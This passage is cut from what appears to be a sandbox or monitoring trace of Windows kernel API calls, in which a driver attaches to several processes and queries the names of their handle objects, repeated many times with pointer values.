Handle=0xffffffff80001320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691ea8c0, HandleInformation=0x0) returned 0x0 [0289.378] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.378] PsReleaseProcessExitSynchronization () returned 0x2 [0289.378] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81b [0289.378] ObQueryNameString (in: Object=0xffffe000691ea8c0, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.379] ObfDereferenceObject (Object=0xffffe000691ea8c0) returned 0x7fff [0289.379] IoCompleteRequest () returned 0x0 [0289.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.379] PsAcquireProcessExitSynchronization () returned 0x0 [0289.379] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.379] ObReferenceObjectByHandle (in: Handle=0xffffffff80001354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a53a3e0, HandleInformation=0x0) returned 0x0 [0289.379] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.379] PsReleaseProcessExitSynchronization () returned 0x2 [0289.379] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81a [0289.379] ObQueryNameString (in: Object=0xffffe0006a53a3e0, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.379] ObfDereferenceObject (Object=0xffffe0006a53a3e0) returned 0x7fff [0289.379] IoCompleteRequest () returned 0x0 [0289.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.379] PsAcquireProcessExitSynchronization () returned 0x0 [0289.379] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.379] ObReferenceObjectByHandle (in: Handle=0xffffffff80001358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a44c610, HandleInformation=0x0) returned 0x0 [0289.379] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.379] PsReleaseProcessExitSynchronization () returned 0x2 [0289.379] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f819 [0289.379] ObQueryNameString (in: Object=0xffffe0006a44c610, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.379] ObfDereferenceObject (Object=0xffffe0006a44c610) returned 0x7fff [0289.379] IoCompleteRequest () returned 0x0 [0289.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.379] PsAcquireProcessExitSynchronization () returned 0x0 [0289.379] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.379] ObReferenceObjectByHandle (in: Handle=0xffffffff80001360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068409e50, HandleInformation=0x0) returned 0x0 [0289.379] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.379] PsReleaseProcessExitSynchronization () returned 0x2 [0289.379] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f818 [0289.379] ObQueryNameString (in: Object=0xffffe00068409e50, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.379] ObfDereferenceObject (Object=0xffffe00068409e50) returned 0x7fff [0289.379] IoCompleteRequest () returned 0x0 [0289.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.379] PsAcquireProcessExitSynchronization () returned 0x0 [0289.379] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.379] ObReferenceObjectByHandle (in: Handle=0xffffffff80001368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a747480, HandleInformation=0x0) returned 0x0 [0289.379] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.379] PsReleaseProcessExitSynchronization () returned 0x2 [0289.379] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f817 [0289.379] ObQueryNameString (in: Object=0xffffe0006a747480, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.379] ObfDereferenceObject (Object=0xffffe0006a747480) returned 0x7fff [0289.379] IoCompleteRequest () returned 0x0 [0289.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.379] PsAcquireProcessExitSynchronization () returned 0x0 [0289.380] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.380] ObReferenceObjectByHandle (in: Handle=0xffffffff80001374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2944a0, HandleInformation=0x0) returned 0x0 [0289.380] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.380] PsReleaseProcessExitSynchronization () returned 0x2 [0289.380] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f816 [0289.380] ObQueryNameString (in: Object=0xffffe0006a2944a0, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.380] ObfDereferenceObject (Object=0xffffe0006a2944a0) returned 0x7fff [0289.380] IoCompleteRequest () returned 0x0 [0289.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.380] PsAcquireProcessExitSynchronization () returned 0x0 [0289.380] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.380] ObReferenceObjectByHandle (in: Handle=0xffffffff80001378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a92e500, HandleInformation=0x0) returned 0x0 [0289.380] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.380] PsReleaseProcessExitSynchronization () returned 0x2 [0289.380] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f815 [0289.380] ObQueryNameString (in: Object=0xffffe0006a92e500, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.380] ObfDereferenceObject (Object=0xffffe0006a92e500) returned 0x7fff [0289.380] IoCompleteRequest () returned 0x0 [0289.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.380] PsAcquireProcessExitSynchronization () returned 0x0 [0289.380] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.380] ObReferenceObjectByHandle (in: Handle=0xffffffff8000137c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a6f620, HandleInformation=0x0) returned 0x0 [0289.380] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.380] PsReleaseProcessExitSynchronization () returned 0x2 [0289.380] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f814 [0289.380] ObQueryNameString (in: Object=0xffffe00068a6f620, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.380] ObfDereferenceObject (Object=0xffffe00068a6f620) returned 0x7fff [0289.380] IoCompleteRequest () returned 0x0 [0289.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.380] PsAcquireProcessExitSynchronization () returned 0x0 [0289.380] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.380] ObReferenceObjectByHandle (in: Handle=0xffffffff800013a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a723780, HandleInformation=0x0) returned 0x0 [0289.380] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.380] PsReleaseProcessExitSynchronization () returned 0x2 [0289.380] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f813 [0289.380] ObQueryNameString (in: Object=0xffffe0006a723780, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.380] ObfDereferenceObject (Object=0xffffe0006a723780) returned 0x7fff [0289.380] IoCompleteRequest () returned 0x0 [0289.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.380] PsAcquireProcessExitSynchronization () returned 0x0 [0289.380] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.380] ObReferenceObjectByHandle (in: Handle=0xffffffff800013a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a9001e0, HandleInformation=0x0) returned 0x0 [0289.380] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.380] PsReleaseProcessExitSynchronization () returned 0x2 [0289.380] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f812 [0289.381] ObQueryNameString (in: Object=0xffffe0006a9001e0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.381] ObfDereferenceObject (Object=0xffffe0006a9001e0) returned 0x7fff [0289.381] IoCompleteRequest () returned 0x0 [0289.381] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.381] PsAcquireProcessExitSynchronization () returned 0x0 [0289.381] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.381] ObReferenceObjectByHandle (in: Handle=0xffffffff800013b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691e7690, HandleInformation=0x0) returned 0x0 [0289.381] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.381] PsReleaseProcessExitSynchronization () returned 0x2 [0289.381] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f811 [0289.381] ObQueryNameString (in: Object=0xffffe000691e7690, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.381] ObfDereferenceObject (Object=0xffffe000691e7690) returned 0x7fff [0289.381] IoCompleteRequest () returned 0x0 [0289.381] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.381] PsAcquireProcessExitSynchronization () returned 0x0 [0289.381] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.381] ObReferenceObjectByHandle (in: Handle=0xffffffff800013f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a75b950, HandleInformation=0x0) returned 0x0 [0289.381] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.381] PsReleaseProcessExitSynchronization () returned 0x2 [0289.381] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f810 [0289.381] ObQueryNameString (in: Object=0xffffe0006a75b950, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.381] ObfDereferenceObject (Object=0xffffe0006a75b950) returned 0x7fff [0289.381] IoCompleteRequest () returned 0x0 [0289.381] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.381] PsAcquireProcessExitSynchronization () returned 0x0 [0289.381] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.381] ObReferenceObjectByHandle (in: Handle=0xffffffff8000140c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691a95e0, HandleInformation=0x0) returned 0x0 [0289.381] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.381] PsReleaseProcessExitSynchronization () returned 0x2 [0289.381] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f80f [0289.381] ObQueryNameString (in: Object=0xffffe000691a95e0, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.381] ObfDereferenceObject (Object=0xffffe000691a95e0) returned 0x7fff [0289.381] IoCompleteRequest () returned 0x0 [0289.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0289.381] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.381] PsAcquireProcessExitSynchronization () returned 0x0 [0289.381] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.381] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000692a4de0, HandleInformation=0x0) returned 0x0 [0289.381] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.382] PsReleaseProcessExitSynchronization () returned 0x2 [0289.382] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffce [0289.382] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.382] ObfDereferenceObject (Object=0xffffe000692a4de0) returned 0x7ffe [0289.382] IoCompleteRequest () returned 0x0 [0289.382] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.382] PsAcquireProcessExitSynchronization () returned 0x0 [0289.382] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.382] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000692b0930, HandleInformation=0x0) returned 0x0 [0289.382] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.382] PsReleaseProcessExitSynchronization () returned 0x2 [0289.382] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffcd [0289.382] ObQueryNameString (in: Object=0xffffe000692b0930, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.382] ObfDereferenceObject (Object=0xffffe000692b0930) returned 0x7fff [0289.382] IoCompleteRequest () returned 0x0 [0289.382] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.382] PsAcquireProcessExitSynchronization () returned 0x0 [0289.382] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.382] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330f20, HandleInformation=0x0) returned 0x0 [0289.382] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.382] PsReleaseProcessExitSynchronization () returned 0x2 [0289.382] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffcc [0289.382] ObQueryNameString (in: Object=0xffffe00069330f20, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.382] ObfDereferenceObject (Object=0xffffe00069330f20) returned 0x7fff [0289.382] IoCompleteRequest () returned 0x0 [0289.382] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.382] PsAcquireProcessExitSynchronization () returned 0x0 [0289.382] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.382] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330d60, HandleInformation=0x0) returned 0x0 [0289.383] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.383] PsReleaseProcessExitSynchronization () returned 0x2 [0289.383] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffcb [0289.383] ObQueryNameString (in: Object=0xffffe00069330d60, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.383] ObfDereferenceObject (Object=0xffffe00069330d60) returned 0x7fff [0289.383] IoCompleteRequest () returned 0x0 [0289.383] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.383] PsAcquireProcessExitSynchronization () returned 0x0 [0289.383] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.383] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330ba0, HandleInformation=0x0) returned 0x0 [0289.383] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.383] PsReleaseProcessExitSynchronization () returned 0x2 [0289.383] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffca [0289.383] ObQueryNameString (in: Object=0xffffe00069330ba0, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.383] ObfDereferenceObject (Object=0xffffe00069330ba0) returned 0x7fff [0289.383] IoCompleteRequest () returned 0x0 [0289.383] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.383] PsAcquireProcessExitSynchronization () returned 0x0 [0289.383] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.383] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693309e0, HandleInformation=0x0) returned 0x0 [0289.383] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.383] PsReleaseProcessExitSynchronization () returned 0x2 [0289.383] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffc9 [0289.383] ObQueryNameString (in: Object=0xffffe000693309e0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.383] ObfDereferenceObject (Object=0xffffe000693309e0) returned 0x7fff [0289.383] IoCompleteRequest () returned 0x0 [0289.383] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.383] PsAcquireProcessExitSynchronization () returned 0x0 [0289.383] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.384] ObReferenceObjectByHandle (in: Handle=0x98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330820, HandleInformation=0x0) returned 0x0 [0289.384] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.384] PsReleaseProcessExitSynchronization () returned 0x2 [0289.384] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffc8 [0289.384] ObQueryNameString (in: Object=0xffffe00069330820, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.384] ObfDereferenceObject (Object=0xffffe00069330820) returned 0x7fff [0289.384] IoCompleteRequest () returned 0x0 [0289.384] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.384] PsAcquireProcessExitSynchronization () returned 0x0 [0289.384] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.384] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330660, HandleInformation=0x0) returned 0x0 [0289.384] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.384] PsReleaseProcessExitSynchronization () returned 0x2 [0289.384] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffc7 [0289.384] ObQueryNameString (in: Object=0xffffe00069330660, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.384] ObfDereferenceObject (Object=0xffffe00069330660) returned 0x7fff [0289.384] IoCompleteRequest () returned 0x0 [0289.384] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.384] PsAcquireProcessExitSynchronization () returned 0x0 [0289.384] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.384] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069331090, HandleInformation=0x0) returned 0x0 [0289.384] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.384] PsReleaseProcessExitSynchronization () returned 0x2 [0289.384] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffc6 [0289.384] ObQueryNameString (in: Object=0xffffe00069331090, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.384] ObfDereferenceObject (Object=0xffffe00069331090) returned 0x7fff [0289.384] IoCompleteRequest () returned 0x0 [0289.384] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.384] PsAcquireProcessExitSynchronization () returned 0x0 [0289.384] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000ac0cf400) [0289.385] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069331c40, HandleInformation=0x0) returned 0x0 [0289.385] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.385] PsReleaseProcessExitSynchronization () returned 0x2 [0289.385] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffc5 [0289.385] ObQueryNameString (in: Object=0xffffe00069331c40, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.385] ObfDereferenceObject (Object=0xffffe00069331c40) returned 0x7fff [0289.385] IoCompleteRequest () returned 0x0 [0289.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x154) returned 0x0 [0289.385] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.385] PsAcquireProcessExitSynchronization () returned 0x0 [0289.385] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400) [0289.385] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, 